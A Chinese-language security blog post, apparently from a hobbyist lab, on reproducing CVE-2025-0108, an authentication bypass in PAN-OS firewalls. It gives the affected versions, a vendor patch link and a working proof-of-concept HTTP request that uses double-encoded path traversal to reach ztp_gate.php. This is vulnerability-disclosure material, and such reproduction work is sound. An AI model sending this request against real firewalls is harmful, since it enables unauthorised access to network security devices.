【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

原创 弥天安全实验室 弥天安全实验室 2025-04-15 20:39

网安引领时代，弥天点亮未来  

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！
0x01漏洞介绍Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。Palo Alto Networks PAN-OS存在安全漏洞，该漏洞源于存在认证绕过漏洞，会影响PAN-OS完整性和保密性。0x02影响版本
1、 PAN OS 11.2 < 11.2.4-h4

2、 PAN OS 11.1 < 11.1.6-h1

3、 PAN OS 10.2 < 10.2.13-h3

4、 PAN OS 10.1 < 10.1.14-h9

0x03漏洞复现
1.访问漏洞环境

2.对漏洞进行复现 POC 漏洞复现GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1Host: 127.0.0.13.Yakit插件测试0x04修复建议目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://security.paloaltonetworks.com/CVE-2025-0108弥天简介学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。口号 网安引领时代，弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫，予以风动，必降弥天之润！   弥  天安全实验室